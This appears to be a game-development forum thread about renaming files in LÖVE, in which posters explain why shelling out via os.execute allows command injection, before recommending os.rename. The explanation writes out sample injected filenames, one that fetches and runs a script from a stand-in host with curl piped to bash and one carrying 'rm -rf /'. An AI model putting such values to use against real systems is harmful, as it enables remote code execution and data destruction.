LÖVE

Not exist this functions in API. Just creating new directory and recursive recreating all files and directories, then delete old folder?

Unfortunately there's no function to rename files in LÖVE :/
I wish there was...

You can use os.execute() but it's a little crude and obviously platform dependent.

Here's a quick example. Only tested on Windows and doesn't return any meaningful errors.

Kadoba wrote:You can use os.execute() but it's a little crude and obviously platform dependent.

Not to mention terribly insecure. I can think of three ways to abuse that, as an attacker, and I'm not even really trying (nor an expert at finding exploits).

Please, no-one use this.

In that case, can you explain so I don't make this mistake again?

The thing is, os.execute is like the keys to the kingdom, and when you hand someone those, you can't really say "only come in Mondays and Tuesdays, and don't steal anything while you're in".

In this specific case, one thing I could do is:
Gone is your hard drive. And I could do anything there: make your computer part of a botnet, upload everything in your POETRY\PERSONAL\DRAFTS\ABOUT_MEGAN\ folder to 4chan. Anything. And this is far from the only way to do something like this, it's just the first thing that I came up with. Stuff like this is called code injection.

renameFile is now an unsafe function. In the vast majority of cases it'll be used in a way that isn't dangerous (hard-coded constants, filenames that already exist in the filesystem, etc), but there will be people who will use your function and not realise they just sold out their players to everyone with bad intentions and an internet connection.

---

This is why I made SELÖVE in the first place. By disallowing access to functionality like os.execute, it prevents things like this from ever being a problem.

Kadoba wrote:In that case, can you explain so I don't make this mistake again?

(unixoid examples only:)

simplified core of that example code: or (equally bad but more readable): For old='foo', new='bar', the executed command will be 'mv "foo" "bar"', which will work.

For old='foo\', new='bar', the command will be 'mv "foo\" "bar"' and the shell might complain about unmatched quotes – the filenames as understood by mv would be 'foo\" ' and 'bar' (plus the problem with that unmatched quote at the end.)

For old='foo', new='bar$(curl exploit.example.com|bash|:;)"', the executed commands(!) will be to get something from exploit.example.com and execute it and then to move "foo" to "bar" (so you don't notice it's broken).

Many variations exist and many problems can be triggered accidentally – there are many special characters that a shell will interpret: $ for variables or even $( ... ) for execution of programs, semicolons, backslashes (which can break your quotes), possibly & and/or % for job control, etc. etc. – and Lua's "%q" format will NOT escape these. Keep in mind that there are various differences between bash (or whatever shell happens to be in use) and Windows' cmd. And if you forget just a single magic character (or even just escape the wrong character in the wrong way) and use this with a somehow user-influenced file name, anything can happen.

Now, this shouldn't be that bad here – the user will usually not attempt to hack itself, running those things directly instead is easier. ;-) The worst that will likely happen is "merely" hard-to-debug / unreproducible errors occuring for some users (whose file names happen to contain special characters). (If your user name is '"eve&rm -rf /;:" or somesuch and you're prefixing the (unescaped) full path to some directory, this might wipe your disk… but of course peoples user names are absolutely always whitespace- and symbol-free. Not.)

However, if that broken function is accessible from otherwise-sandboxed downloadable level packs or somesuch, this can lead to lots of fun and not-so-sandboxed level packs that read your email etc.

TL;DR: Just avoid this can of worms altogether and use a proper rename function. And if you think you can write a proper escaping function, you're probably wrong. (But you'll only find out when it blows up.)

----------

A better way would be to use LuaJIT's FFI to call the system's rename (which might be platform-dependent, no idea how that works on Windows.)
----------

An even better way would be to have a built-in rename so you don't have to worry about platform differences.

Lua's os module has the os.rename function (which takes platform-dependent full paths, unlike love.filesystem functions.)

love.filesystem doesn't have a rename function because it uses the PhysFS library as a backend, which doesn't include that functionality.

slime

os.rename

Thx, i try it. I think need close all opened files in that directory before?

Please, tell us more about Megan, Robin.